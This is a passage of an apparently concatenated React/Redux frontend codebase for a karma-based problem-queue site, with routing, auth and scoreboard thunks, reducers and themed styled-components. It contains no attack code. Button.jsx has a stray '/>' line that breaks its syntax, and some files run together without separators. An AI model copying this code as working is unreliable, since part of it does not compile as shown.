{new Date(props.created).toLocaleDateString()}
</TransactionBoxMetaSection>
<TransactionBoxMetaSection>
<Link to={'/q/' + props.queue}>{props.queue}</Link>
{' Karma value: ' + props.karma_value}
</TransactionBoxMetaSection>
<TransactionBoxMetaSection>
{'Monetary value: ' + props.monetary_value + "$"}
</TransactionBoxMetaSection>
</TransactionBoxMeta>
{props.description}<br/>
</StyledTransactionBox>
)
export default TransactionBox
<file_sep>/src/constants/misc/dateTimeOptions.jsx
// Shared Intl.DateTimeFormat options: numeric date plus hours:minutes.
export const dateTimeOptions = {
	year: 'numeric',
	month: 'numeric',
	day: 'numeric',
	hour: 'numeric',
	minute: 'numeric'
}
export const dateTimeDefaultLocale = 'en-GB'<file_sep>/src/components/confirm/PasswordChange.jsx
import React from 'react';
import { connect } from 'react-redux'
import { Link } from 'react-router-dom'
import { confirmPasswordChangeStages } from '../../constants/content/confirm/passwordChange'
import { confirmPasswordChangeActions } from '../../actions/content/confirm/passwordChange'
import PasswordChangeForm from './PasswordChange/PasswordChangeForm'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.confirm.passwordChange.page
const mapDispatchToProps = dispatch => ({
	verify: (token) => dispatch(confirmPasswordChangeActions.verify(token)),
	reset: () => dispatch(confirmPasswordChangeActions.reset())
})
/**
 * Password-reset confirmation page. The token from the URL is verified
 * on mount; rendering then follows the page stage:
 *   SUBMITTING_FORM -> show the new-password form,
 *   COMPLETED       -> show a link to the login page,
 *   INVALID_TOKEN   -> show only the backend message.
 */
class ConfirmPasswordChangePage extends React.Component {
	componentDidMount() {
		this.props.verify(this.props.token)
	}
	componentWillUnmount(){
		// Reset the stage so a revisit starts the flow fresh.
		this.props.reset()
	}
	render() {
		switch (this.props.stage) {
			case confirmPasswordChangeStages.COMPLETED:
				return (
					<ContentDiv>
						{'Password successfully changed, click '}
						<Link to="/login">here</Link>
						{' to log in'}
					</ContentDiv>
				)
			case confirmPasswordChangeStages.SUBMITTING_FORM:
				return (
					<ContentDiv>
						<BackendMessage messageType={this.props.messageType}>
							{this.props.message}
						</BackendMessage>
						<PasswordChangeForm token={this.props.token} />
					</ContentDiv>
				)
			case confirmPasswordChangeStages.INVALID_TOKEN:
			default:
				return (
					<ContentDiv>
						<BackendMessage messageType={this.props.messageType}>
							{this.props.message}
						</BackendMessage>
					</ContentDiv>
				)
		}
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(ConfirmPasswordChangePage)
<file_sep>/src/styled-components/defaults/Button.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
// Generic themed button. `noBorder` suppresses the Buzzfeed outline.
export const BuzzfeedButton = styled.button`
	background: transparent;
	border-radius: 3px;
	${props => !props.noBorder && 'border: 2px solid rgb(17,0,73);'}
	color: rgb(17,0,73);
	margin: 2px 1em;
	padding: 0.25em 1em;
	:hover {
		cursor: pointer;
		text-decoration: underline;
	}
`
export const TryhardButton = props => <button {...props} noBorder={undefined}/>
// Callers may inject their own themed variants via props.buzzfeed/tryhard.
const Button = props => (
	<ThemeSelector
		buzzfeed={props.buzzfeed || <BuzzfeedButton {...props} />}
		tryhard={props.tryhard || <TryhardButton {...props} />}
	/>
)
/>
export default Button<file_sep>/src/components/form/ReduxFormSelect.jsx
import React from 'react'
import ReactSelect from '../../styled-components/form/ReactSelect'
// react-select adapter for redux-form fields.
const ReduxFormSelect = props => {
	const { input, options, label, defaultValue, defaultInputValue } = props;
	if (defaultValue) {
		// NOTE(review): mutating `input.value` (a prop supplied by
		// redux-form) is an anti-pattern and, per the author's own note
		// below, does not work — confirm and remove or replace with
		// redux-form `initialValues`.
		// (original comments, translated) "LOL, fixed it" /
		// "UPDATE: it does NOT work :D :D"
		input.value = defaultValue
	}
	return (
		<div>
			{label && <label>{label}</label>}
			<ReactSelect
				{...input}
				onChange={value => {
					input.onChange(value)
				}}
				onBlur={() => input.onBlur(input.value)}
				options={options}
				defaultValue={defaultValue}
				defaultInputValue={defaultInputValue}
			/>
		</div>
	)
}
export default ReduxFormSelect<file_sep>/src/reducers/content/forgotPwdPage.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { forgotPwdConstants, forgotPwdStages } from '../../constants/content/forgotPwdPage'
import { appConfig } from '../../appConfig'
// Initial stage: user is entering the email/username for the reset.
const defaultState = {
	stage: forgotPwdStages.SUBMITTING_FORM
}
/**
 * State machine for the "forgot password" page.
 * SUCCESS switches to EMAIL_SENT and builds a structured message
 * (intro text plus step-by-step instructions) that differs between
 * production mail and the demo/test mail service.
 */
const forgotPwdPageReducer = (state = defaultState, action) => {
	switch (action.type) {
		case forgotPwdConstants.REQUEST:
			return {
				stage: forgotPwdStages.SUBMITTING_FORM,
				message: "Waiting for server response",
				messageType: action.messageType
			}
		case forgotPwdConstants.SUCCESS:
			// NOTE(review): the '<EMAIL>' / '<PASSWORD>' strings below look
			// like scrubbed placeholders for the demo mailbox credentials —
			// confirm the real values before release.
			return {
				stage: forgotPwdStages.EMAIL_SENT,
				message: {
					message: appConfig.productionMail ? "YUH! check ur emeil adres, thereee should be an confermation link for pwd reset, so u dont have to regooster again. To do so follow these steps" : "Hello, this is just a demo, which doesn't use real smtp server - testing email service is used instead. That means, to complete the process",
					steps: appConfig.productionMail ? [
						"Open your favourite email @gmail.biz",
						"Click the email you just received",
						"click the link",
						"PROFIT"
					] : [
						"go to \"https://ethereal.email\"",
						"log in with following credentials:\n\tusername: \"<EMAIL>\"\n\tpassword:\"<PASSWORD>\"",
						"in section messages should be your email, i.e. addressed to \"" + action.user.username + "\" with email adress \"" + action.user.email + "\""
					]
				},
				messageType: action.messageType
			}
		case forgotPwdConstants.FAILED:
			return {
				stage: forgotPwdStages.SUBMITTING_FORM,
				message: action.message,
				messageType: action.messageType
			}
		case forgotPwdConstants.RESET:
			return defaultState
		default:
			return state
	}
}
// Combine the page state machine with the redux-form reducer.
const forgotPwdFormReducer = reducer
export default combineReducers({
	page: forgotPwdPageReducer,
	form: forgotPwdFormReducer
})
<file_sep>/src/styled-components/profile/TransactionBox.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedTransactionBox = styled.div`
display: flex;
flex-direction: column;
width: 90%;
margin: 20px;
border-radius: 10px;
padding: 10px;
background-color: rgba(67, 0, 50, 0.7);
`
const TryhardTransactionBox = props => <div {...props}/>
const TransactionBox = props => <ThemeSelector
buzzfeed={<BuzzfeedTransactionBox {...props} />}
tryhard={<TryhardTransactionBox {...props} />}
/>
export default TransactionBox<file_sep>/src/constants/content/confirm/emailChange.jsx
// Action types for the email-change confirmation flow.
export const confirmEmailChangeConstants = {
	REQUEST: "CONFIRM_EMAIL_CHANGE_REQUEST",
	SUCCESS: "CONFIRM_EMAIL_CHANGE_SUCCESS",
	FAILED: "CONFIRM_EMAIL_CHANGE_FAILED"
}<file_sep>/src/reducers/content/statistics/economyPage.jsx
import { economyPageConstants } from '../../../constants/content/statistics/economyPage'
const defaultState = {}
/**
 * Reducer for the economy statistics page (queue karma exchange values).
 */
function economyPageReducer(state = defaultState, action) {
	switch (action.type) {
		case economyPageConstants.LOAD_KARMA_VALUES_REQUEST:
			return {
				message: "Loading data...",
				messageType: action.messageType
			}
		case economyPageConstants.LOAD_KARMA_VALUES_SUCCESS:
			return {
				karmaValues: action.data
			}
		case economyPageConstants.LOAD_KARMA_VALUES_FAILED:
			return {
				message: action.message,
				messageType: action.messageType,
				// BUG FIX: was `karmaValues: state`, which nested the whole
				// state object; keep the last successfully loaded values.
				karmaValues: state.karmaValues
			}
		default:
			return state
	}
}
export default economyPageReducer
<file_sep>/src/styled-components/header/HeaderDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { headerStyleConstants } from './Constants'
//float: ${props => props.float || 'left'};
const BuzzfeedHeaderDiv = styled.div`
display: flex;
flex-wrap: wrap;
justify-content: ${props => props.shrink ? 'center' : 'flex-start'};
${props => props.grow && 'flex-grow: 1;'}
${props => props.shrink && 'flex-shrink: 1;'}
vertical-align: middle;
padding: 10px;
${props => `font-size: ${props.fontSize || '14px'}` };
color: rgb(17,0,73);
font-family: Verdana, Arial, Helvetica, sans-serif;
@media(max-width: ${headerStyleConstants.HEADER_COLLAPSE_LOGGED_IN_CAPTION}) {
${props => props.collapse && "display: none;"}
}
`
const TryhardHeaderDiv = props =><div {...props} shrink={undefined} grow={undefined} collapse={undefined} fontSize={undefined}/>
const HeaderDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedHeaderDiv {...props} />}
tryhard={<TryhardHeaderDiv {...props} />}
/>
export default HeaderDiv<file_sep>/src/components/routes/PrivateRoute.jsx
import React from "react"
import { Route } from "react-router-dom";
import Auth from '../auth/Auth'
const PrivateRoute = ({loggedIn, render, ...rest}) => {
return (
<Route
{...rest}
render={(routeProps) => {
return <Auth loggedIn={loggedIn} component={() => render(routeProps)} />
}
}
/>
);
}
export default PrivateRoute<file_sep>/src/constants/content/profile/profilePage.jsx
// Action types for the public profile page.
export const profilePageConstants = {
	LOAD_USER_REQUEST: 'PROFILE_PAGE_LOAD_USER_REQUEST',
	LOAD_USER_SUCCESS: 'PROFILE_PAGE_LOAD_USER_SUCCESS',
	LOAD_USER_FAILED: 'PROFILE_PAGE_LOAD_USER_FAILED'
}<file_sep>/src/components/queue/QueueSidebarEntries.jsx
import React from 'react';
import { Link } from "react-router-dom"
const QueueSidebarEntries = ({queues, baseUrl}) => {
const keys = Object.keys(queues);
return (
<ul>
{keys.map(k => (
<li key={k}>
<Link to={baseUrl + '/' + k}>{k}</Link>
<QueueSidebarEntries queues={queues[k]} baseUrl={baseUrl}/>
</li>
))}
</ul>
);
}
export default QueueSidebarEntries<file_sep>/src/components/problem/ProblemPage/Submission.jsx
import React from 'react'
import { connect } from 'react-redux'
import { Link } from "react-router-dom"
import MarkdownRender from '../../form/MarkdownRender'
import Reply from './Reply'
import PostReplyForm from './PostReplyForm'
import { problemPageActions } from '../../../actions/content/problemPage'
import SubmissionDiv from '../../../styled-components/problem/SubmissionDiv'
import SubmissionBox from '../../../styled-components/problem/SubmissionBox'
import ContentInfo from '../../../styled-components/problem/ContentInfo'
import Button from '../../../styled-components/defaults/Button'
import ButtonDiv from '../../../styled-components/defaults/ButtonDiv'
import RepliesButton from '../../../styled-components/problem/RepliesButton'
import RepliesButtonDiv from '../../../styled-components/problem/RepliesButtonDiv'
import SolutionLabel from '../../../styled-components/problem/SolutionLabel'
import { dateTimeDefaultLocale, dateTimeOptions } from '../../../constants/misc/dateTimeOptions'
// Pull this submission's slice out of the paged submissionEntries store.
const mapStateToProps = (state, ownProps) => {
	const submissionState = state.content.problemPage.page.submissionEntries[ownProps.page || 0][ownProps.submissionId]
	return {
		content: submissionState.content,
		replyEntries: submissionState.replyEntries,
		repliesHidden: submissionState.repliesHidden,
		user: submissionState.submitted_by.username,
		created: submissionState.created
	}
}
const mapDispatchToProps = (dispatch, ownProps) => ({
	loadReplyPage: (page) => dispatch(problemPageActions.loadReplyPage(ownProps.submissionId, page)),
	hideReplies: () => dispatch(problemPageActions.hideReplies(ownProps.submissionId)),
	acceptSubmission: () => dispatch(problemPageActions.acceptSubmission(ownProps.submissionId, ownProps.problem, ownProps.token)),
	selectReplyForm: () => dispatch(problemPageActions.selectReplyForm(ownProps.submissionId))
})
/**
 * One submission under a problem: markdown content, accept/reply
 * buttons, an optional inline reply form and a paged reply list.
 * With `wrapper` unset only the bare submission box is rendered.
 */
class Submission extends React.Component {
	render() {
		// replyEntries is an array of per-page objects; merge them into a
		// single id -> reply map for rendering.
		const replyEntries = this.props.replyEntries.reduce((acc,cv) => Object.assign(acc,cv), {})
		const submissionBox = (
			<SubmissionBox solution={this.props.isSolution}>
				<ContentInfo>
					{this.props.isSolution && <SolutionLabel>SOLUTION</SolutionLabel>}
					{new Date(this.props.created).toLocaleDateString(dateTimeDefaultLocale, dateTimeOptions)}
					{this.props.user && <Link to={'/u/' + this.props.user}>{this.props.user}</Link>}
				</ContentInfo>
				<MarkdownRender source={this.props.content} />
				<ButtonDiv>
					{this.props.acceptButton && <Button onClick={this.props.acceptSubmission}>Accept Submission</Button>}
					{this.props.replyButton && <Button onClick={this.props.selectReplyForm}>Reply</Button>}
				</ButtonDiv>
			</SubmissionBox>
		)
		if (!this.props.wrapper) {
			return submissionBox
		}
		return (
			<SubmissionDiv>
				{submissionBox}
				{this.props.hasActiveReplyForm && <PostReplyForm token={this.props.token} submission={this.props.submissionId} problem={this.props.problem}/>}
				{this.props.repliesHidden === false && (
					<ul>
						{
							Object.keys(replyEntries).map((e, index) => (
								<li key={index}>
									<Reply
										content={replyEntries[e].content}
										created={replyEntries[e].created}
										user={replyEntries[e].submitted_by.username}
									/>
								</li>))
						}
					</ul>
				)}
				{
					this.props.loadRepliesButton &&
					(
						<RepliesButtonDiv>
							{this.props.paging && this.props.paging.hasMore && <RepliesButton onClick={() => this.props.loadReplyPage(this.props.paging.page + 1)}>{'Load ' + (!this.props.repliesHidden ? 'More ' : '') + 'Replies'}</RepliesButton>}
							{!this.props.repliesHidden && <RepliesButton onClick={() => this.props.hideReplies()}>Hide Replies</RepliesButton>}
						</RepliesButtonDiv>
					)
				}
			</SubmissionDiv>
		)
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(Submission)
<file_sep>/src/App.jsx
import React from "react";
import { BrowserRouter as Router, Route, Redirect, Switch } from "react-router-dom";
import { connect } from 'react-redux'
import IEPage from './components/issues/InternetExplorer'
import Homepage from "./components/home/Homepage"
import Header from "./components/header/Header"
import PrivateRoute from "./components/routes/PrivateRoute"
import NonAuthRoute from './components/routes/NonAuthRoute'
import ProfileRoute from "./components/routes/ProfileRoute"
import SignUpPage from "./components/signup/SignUpPage"
import Login from "./components/auth/Login"
import LogoutPage from './components/auth/LogoutPage'
import ForgotPassword from './components/forgotpwd/ForgotPassword'
import QueuePage from "./components/queue/QueuePage"
import ProblemPage from "./components/problem/ProblemPage"
import BoostPage from "./components/problem/BoostPage"
import SubmitProblemPage from "./components/queue/SubmitProblemPage"
import ProfilePage from "./components/profile/ProfilePage"
import ActivityPage from "./components/profile/ActivityPage"
import PersonalInformationPage from './components/profile/PersonalInformationPage'
import PremiumPage from './components/profile/PremiumPage'
import TransactionPage from './components/profile/TransactionPage'
import EconomyPage from "./components/statistics/EconomyPage"
import ScoreboardPage from "./components/statistics/ScoreboardPage"
import ConfirmRegistrationPage from "./components/confirm/Registration"
import ConfirmPasswordChangePage from "./components/confirm/PasswordChange"
import ConfirmEmailChangePage from "./components/confirm/EmailChange"
import ConfirmUsernameChangePage from "./components/confirm/UsernameChange"
import { authActions } from './actions/auth'
import AppDiv from './styled-components/App'
// Read a single query-string parameter (e.g. "?q=foo") from a react-router
// routeProps object; returns null when the parameter is absent.
const parseUrlParam = (routeProps, paramName) => {
	const searchParams = new URLSearchParams(routeProps.location.search)
	return searchParams.get(paramName)
}
// Root application component: verifies any persisted auth token on mount
// (and whenever it changes), short-circuits to an error page for Internet
// Explorer, and declares every client-side route of the app.
class App extends React.Component {
	componentDidMount() {
		// Re-validate the stored token as soon as the app loads.
		this.props.verify(this.props.token)
	}
	componentDidUpdate(prevProps) {
		// Only re-verify when the token actually changed, to avoid loops.
		if (prevProps.token !== this.props.token) {
			this.props.verify(this.props.token)
		}
	}
	render() {
		const loggedIn = !!this.props.user
		// Internet Explorer detection: "MSIE" UA token or document.documentMode.
		if((navigator.userAgent.indexOf("MSIE") !== -1 ) || (!!document.documentMode === true )) { //IF IE > 10
			return (<IEPage />)
		}
		return (
			<Router>
				<AppDiv>
					<Header logout={this.props.logout} loggedIn={loggedIn} username={this.props.user ? this.props.user.username : null}/>
					<Switch>
						<Route exact path="/" render={() => <Homepage user={this.props.user}/>} />
						<NonAuthRoute path="/signup" loggedIn={loggedIn} render={() => <SignUpPage/> } />
						<NonAuthRoute path="/forgotpwd" loggedIn={loggedIn} render={(routeProps) => <ForgotPassword loggedIn={loggedIn} redirect={(routeProps.location && routeProps.location.state) ? routeProps.location.state.from : null}/>}/>
						<Route path="/login" loggedIn={loggedIn} render={(routeProps) => <Login loggedIn={loggedIn} redirect={(routeProps.location && routeProps.location.state) ? routeProps.location.state.from : '/'}/>} />
						<Route exact path="/q/:name" render={(routeProps) => <QueuePage queue={routeProps.match.params.name} loggedIn={loggedIn}/>} />
						<PrivateRoute path="/submitProblem" render={(routeProps) => <SubmitProblemPage token={this.props.token} urlQueue={parseUrlParam(routeProps, 'q')}/>} loggedIn={loggedIn}/>
						<Route exact path="/problem/:id" render={ (routeProps) => <ProblemPage loggedIn={loggedIn} token={this.props.token} problemId={routeProps.match.params.id} user={this.props.user}/>} />
						<Route path="/problem/:id/boost" render={(routeProps) => loggedIn && <BoostPage token={this.props.token} problemId={routeProps.match.params.id} loggedIn={loggedIn}/>} />
						<Route exact path="/u/:username" render={
							(routeProps) => <ProfilePage
								viewer={this.props.user ? this.props.user.username : null}
								user={routeProps.match.params.username}
								loggedIn={loggedIn}
							/> }/>
						<Route path="/u/:username/activity" render={
							(routeProps) => <ActivityPage
								viewer={this.props.user ? this.props.user.username : null}
								user={routeProps.match.params.username}
								loggedIn={loggedIn}
							/> }/>
						<ProfileRoute path={'/u/:username/personal'} render={(routeProps) => (<PersonalInformationPage user={routeProps.match.params.username} token={this.props.token}/>)} loggedIn={loggedIn} viewer={this.props.user ? this.props.user.username : null}/>
						<ProfileRoute path={'/u/:username/premium'} render={(routeProps) => (<PremiumPage user={routeProps.match.params.username}/>)} loggedIn={loggedIn} viewer={this.props.user ? this.props.user.username : null}/>
						<ProfileRoute path={'/u/:username/transactions'} render={(routeProps) => <TransactionPage user={routeProps.match.params.username} token={this.props.token}/>} loggedIn={loggedIn} viewer={this.props.user ? this.props.user.username : null}/>
						<Route path="/statistics/economy" render={() => <EconomyPage token={this.props.token}/>} loggedIn={loggedIn}/>
						<Route path="/statistics/scoreboard/:queue" render={(routeProps) => <ScoreboardPage token={this.props.token} queue={routeProps.match.params.queue} urlPage={Number(parseUrlParam(routeProps, 'page')) || 1} />} loggedIn={loggedIn} />
						<Route path='/logout' render={(routeProps) => <LogoutPage loggedIn={loggedIn} redirect={(routeProps.location && routeProps.location.state) ? routeProps.location.state.from : '/login'} logout={this.props.logout}/>}/>
						<NonAuthRoute path="/confirm/registration/:token" loggedIn={loggedIn} render={(routeProps) => <ConfirmRegistrationPage token={routeProps.match.params.token}/>} />
						<NonAuthRoute path="/confirm/passwordChange/:token" loggedIn={loggedIn} render={(routeProps) => <ConfirmPasswordChangePage token={routeProps.match.params.token}/>} />
						<NonAuthRoute path="/confirm/emailChange/:token" loggedIn={loggedIn} render={(routeProps) => <ConfirmEmailChangePage token={routeProps.match.params.token}/>} />
						<NonAuthRoute path="/confirm/usernameChange/:token" loggedIn={loggedIn} render={(routeProps) => <ConfirmUsernameChangePage token={routeProps.match.params.token}/>} />
						{/* Convenience redirect: /profile jumps to the logged-in user's page. */}
						{loggedIn && <Redirect from='/profile' to={'/u/' + this.props.user.username} />}
					</Switch>
				</AppDiv>
			</Router>
		)
	}
}
// Expose the authenticated user and JWT from the auth slice of the store.
const mapStateToProps = (state) => {
	const { user, token } = state.auth
	return { user, token }
}
// Bind the auth action creators (logout / login / verify) to dispatch.
const mapDispatchToProps = (dispatch) => {
	return {
		logout: (token) => dispatch(authActions.logout(token)),
		login: (username, pwd) => dispatch(authActions.login(username, pwd)),
		verify: (token) => dispatch(authActions.verify(token))
	}
}
// Connect App to the Redux store (auth state + auth action creators).
export default connect(mapStateToProps, mapDispatchToProps)(App)
<file_sep>/src/constants/content/signUpPage.jsx
// Redux action types for the sign-up flow.
export const signupConstants = {
	REQUEST: 'SIGNUP_REQUEST',
	SUCCESS: 'SIGNUP_SUCCESS',
	FAILED: 'SIGNUP_FAILED',
	RESET: 'SIGNUP_PAGE_RESET'
};
// UI stages of the sign-up page (consumed by reducers/content/signupPage).
export const signupStages = {
	SUBMITTING_FORM: 0,
	COMPLETED: 1
}
<file_sep>/src/components/profile/PersonalInformationPage/ChangeUsernameForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import renderField from '../../form/RenderField'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import { signupActions } from '../../../actions/content/signup'
import Button from '../../../styled-components/defaults/Button'
// redux-form sync validation: the new username must be non-empty.
const validate = (values) => {
	return values.username ? {} : { username: 'Required' }
}
// On submit, hand the form values to the personal-information flow,
// tagged with the form they came from ('username').
const submit = (values, dispatch, props) => {
	const action = personalInformationPageActions.filled('username', values)
	dispatch(action)
}
// Presentational form: a single "username" field plus a submit button.
let ChangeUsernameForm = (props) => (
	<form onSubmit={props.handleSubmit}>
		Change Username
		<div>
			<Field name="username" component={renderField} type="text" placeholder="New username"/>
		</div>
		<Button type="submit">Submit</Button>
	</form>
)
// redux-form wiring: sync-validate locally, async-validate the username on
// blur via the signup validator; form state lives under the
// personal-information page slice rather than the default `form` reducer.
ChangeUsernameForm = reduxForm({
	form: 'changeUsername',
	validate,
	onSubmit: submit,
	asyncBlurFields: ['username'],
	asyncValidate: (values, dispatch, props, blurredField) => signupActions.validateField(values, blurredField),
	getFormState: ({content}) => content.profile.personalInformationPage.form
})(ChangeUsernameForm)
export default ChangeUsernameForm
import { activityPageConstants } from '../../../constants/content/profile/activityPage'
// Initial shape: no activity entries loaded yet, first page not fetched.
const defaultState = {
	entries: [],
	paging: {
		page: 0,
		hasMore: true
	}
}
/**
 * Reducer for the profile activity page. `entries` is an array of pages
 * (one array of activity records per fetched page index, 0-based).
 */
function activityPageReducer(state = defaultState, action) {
	// Clamp the requested page index to at least 1.
	const activePage = (!action.activePage || action.activePage <= 1) ? 1 : action.activePage
	switch (action.type) {
		case activityPageConstants.SET_ACTIVE_PAGE_REQUEST:
			return {
				entries: state.entries,
				loading: true,
				paging: {
					page: state.paging.page
				}
			}
		case activityPageConstants.SET_ACTIVE_PAGE_SUCCESS: {
			// BUG FIX: copy before writing — the previous code assigned into
			// state.entries directly, mutating the old state object (and even
			// the shared defaultState), which breaks Redux change detection.
			const newEntries = [...state.entries]
			newEntries[activePage - 1] = action.data || []
			return {
				entries: newEntries.slice(0, activePage),
				paging: {
					// If there was no data, dont update
					page: (action.data && action.data.length > 0) ? activePage : state.paging.page,
					hasMore: action.hasMore
				},
			}
		}
		case activityPageConstants.SET_ACTIVE_PAGE_FAILED:
			return {
				message: action.message,
				paging: {
					...state.paging,
					hasMore: false
				},
				entries: state.entries
			}
		case activityPageConstants.SET_USER:
			// Only reset when the profile being viewed actually changes.
			return state.user === action.user ? state : {
				...defaultState,
				user: action.user
			}
		case activityPageConstants.RESET:
			return defaultState
		default:
			return state
	}
}
export default activityPageReducer
import { appConfig } from '../../../appConfig'
import { scoreboardPageConstants } from '../../../constants/content/statistics/scoreboardPage'
import { messageType } from '../../../constants/misc/backendMessageTypes'
/**
 * Thunk: load one page of the scoreboard for `queue`. Dispatches
 * LOAD_PAGE_REQUEST, then LOAD_PAGE_SUCCESS with the fetched rows or
 * LOAD_PAGE_FAILED on any error (including a missing queue name).
 */
function setActivePage(queue, pageIndex) {
	const request = (activePage) => ({ type: scoreboardPageConstants.LOAD_PAGE_REQUEST, queue, activePage })
	const success = (queue, activePage, data) => ({ type: scoreboardPageConstants.LOAD_PAGE_SUCCESS, queue, activePage, data })
	const failure = (message) => ({ type: scoreboardPageConstants.LOAD_PAGE_FAILED, queue, message, messageType: messageType.ERROR })
	return dispatch => {
		if (!queue) {
			// BUG FIX: the failure action was previously returned without being
			// dispatched, so the store never learned about the error.
			return dispatch(failure('No queue specified'))
		}
		dispatch(request(pageIndex));
		var requestUrl = appConfig.backendUrl + "/queue/" + queue + '/scoreboard'
		requestUrl += (pageIndex && pageIndex > 0) ? "?page=" + pageIndex : ""
		fetch(requestUrl, {
			method: 'GET',
			headers: { 'Content-Type': 'application/json' }
		}).then(response => {
			// NOTE: perhaps parse 304 statuses, so more efficient
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(body => {
			dispatch(success(queue, pageIndex, body.data))
		}).catch(error => {
			dispatch(failure(JSON.stringify(error)))
		})
	}
}
/**
 * Thunk: locate `username` on the scoreboard of `queue` and dispatch the
 * page number the user appears on (given `recordsPerPage`, default 50).
 * Validation failures return a plain failure action instead of a thunk.
 */
function findUser(queue, username, recordsPerPage) {
	const request = () => ({ type: scoreboardPageConstants.USER_SEARCH_REQUEST, queue })
	const success = (username, activePage) => ({ type: scoreboardPageConstants.USER_SEARCH_SUCCESS, queue, username, activePage })
	const failure = (message) => ({ type: scoreboardPageConstants.USER_SEARCH_FAILED, queue, message, messageType: messageType.ERROR })
	if(!queue) {
		return failure('No queue specified')
	}
	if(!username) {
		return failure('No username specified')
	}
	if(!recordsPerPage) {
		recordsPerPage = 50
	}
	return dispatch => {
		dispatch(request());
		const requestUrl = appConfig.backendUrl + "/queue/" + queue + '/scoreboard/position/' + username
		fetch(requestUrl, {
			method: 'GET',
			headers: { 'Content-Type': 'application/json' }
		}).then(response => {
			// NOTE: perhaps parse 304 statuses, so more efficient
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(body => {
			if (!body.position) {
				return dispatch(failure('User "' + username + '" has no score in queue "' + queue + '"'))
			}
			// Convert the 1-based scoreboard position into a page number.
			dispatch(success(username, Math.floor(((body.position - 1) / recordsPerPage) + 1)))
		}).catch(error => {
			dispatch(failure(JSON.stringify(error)))
		})
	}
}
/**
 * Thunk: fetch the user count for `queue` and dispatch the derived number
 * of scoreboard pages (page size 50, hard-coded to match setActivePage).
 */
function getNumberOfPages(queue) {
	const request = () => ({ type: scoreboardPageConstants.USER_COUNT_REQUEST, queue })
	const success = (pageCount) => ({ type: scoreboardPageConstants.USER_COUNT_SUCCESS, queue, pageCount })
	const failure = (message) => ({ type: scoreboardPageConstants.USER_COUNT_FAILED, queue, message, messageType: messageType.ERROR })
	if(!queue) {
		return failure('No queue specified')
	}
	return dispatch => {
		dispatch(request());
		const requestUrl = appConfig.backendUrl + "/queue/" + queue + '/user_count'
		fetch(requestUrl, {
			method: 'GET',
			headers: { 'Content-Type': 'application/json' }
		}).then(response => {
			// NOTE: perhaps parse 304 statuses, so more efficient
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(body => {
			// NOTE(review): reads body.body_count, while the endpoint is named
			// /user_count — confirm against the backend that this field name is
			// correct (vs. e.g. body.user_count).
			const page_count = (Math.floor(body.body_count / 50)) + 1
			dispatch(success(page_count))
		}).catch(error => {
			dispatch(failure(JSON.stringify(error)))
		})
	}
}
// Action creator: clear all scoreboard-page state back to its defaults.
function reset() {
	return { type: scoreboardPageConstants.RESET }
}
/**
 * Async validator: resolves when `username` exists on the backend, rejects
 * with a redux-form style `{identifier: ...}` error object otherwise.
 */
function validateUserExists(username) {
	return new Promise((resolve, reject) => {
		fetch(appConfig.backendUrl + "/u/exists", {
			method: 'POST',
			headers: { 'Content-Type': 'application/json' },
			body: JSON.stringify({user: username})
		}).then(response => {
			if (response.status >= 200 && response.status < 400) {
				return resolve()
			}
			return reject({identifier: 'User "' + username + '" does not exist'})
		}).catch(() => {
			// BUG FIX: on a network-level fetch failure the promise previously
			// never settled, leaving the async validation hanging forever.
			reject({identifier: 'Could not verify user "' + username + '"'})
		})
	})
}
// Public action-creator API for the scoreboard page.
export const scoreboardPageActions = {
	setActivePage,
	findUser,
	getNumberOfPages,
	reset,
	validateUserExists
}
<file_sep>/src/styled-components/problem/ProblemDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
// Buzzfeed theme: width-constrained wrapper with italic, underline-on-hover links.
const BuzzfeedProblemDiv = styled.div`
	width: 90%;
	margin: auto auto 50px auto;
	a {
		display: inline-block;
		text-decoration: none;
		color: rgb(67, 0, 50);
		font-style: italic;
	}
	a:hover {
		text-decoration: underline;
	}
	input {
		margin: 5px;
	}
	font-size: 15px;
`
// Tryhard theme: plain, unstyled div.
const TryhardProblemDiv = props => <div {...props}/>
// Render whichever themed variant the active theme selects.
const ProblemDiv = props => <ThemeSelector
	buzzfeed={<BuzzfeedProblemDiv {...props} />}
	tryhard={<TryhardProblemDiv {...props} />}
/>
export default ProblemDiv
import { authConstants } from '../constants/auth'
import { messageType } from '../constants/misc/backendMessageTypes'
import { appConfig } from '../appConfig'
// Public action-creator API for authentication (thunks defined below;
// function declarations are hoisted, so this export can appear first).
export const authActions = {
	login,
	logout,
	verify
};
/**
 * Thunk: authenticate with username/password. Validates inputs locally
 * (returning a plain failure action), POSTs to /signin, persists the token
 * in localStorage and dispatches LOGIN_SUCCESS; any fetch/HTTP error
 * dispatches LOGIN_INVALID_CREDENTIALS.
 */
function login(username, password) {
	if (!username) {
		return {
			type: authConstants.LOGIN_FAILURE,
			message: 'Missing username',
			messageType: messageType.ERROR
		}
	}
	if (!password) {
		return {
			type: authConstants.LOGIN_FAILURE,
			message: 'Missing password',
			messageType: messageType.ERROR
		}
	}
	return dispatch => {
		dispatch(request({ username }));
		// POST credentials, then persist the token and report success/failure.
		fetch(appConfig.backendUrl + "/signin", {
			method: 'POST',
			headers: { 'Content-Type': 'application/json' },
			body: JSON.stringify({ username, password })
		}).then(response => {
			if (response.status >= 200 && response.status < 400){
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response;
				throw error;
			}
		}).then(response => {
			return response.json()
